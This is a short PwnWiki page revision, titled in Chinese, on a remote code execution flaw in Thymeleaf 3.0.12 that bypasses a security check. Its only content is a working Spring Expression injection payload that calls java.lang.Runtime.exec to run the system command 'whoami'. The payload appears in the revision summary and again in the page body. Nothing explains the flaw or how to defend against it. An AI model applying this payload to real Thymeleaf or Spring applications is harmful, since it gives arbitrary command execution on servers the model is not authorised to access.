Thymeleaf 3.0.12 RCE安全檢查繞過漏洞

From PwnWiki
Revision as of 10:18, 22 May 2021 by Pwnwiki (talk | contribs) (Created page with "==Payload== <pre> ${T (java.lang.Runtime).getRuntime().exec("whoami")} </pre>")
(diff) ← Older revision | Latest revision (diff) | Newer revision → (diff)

Payload

${T (java.lang.Runtime).getRuntime().exec("whoami")}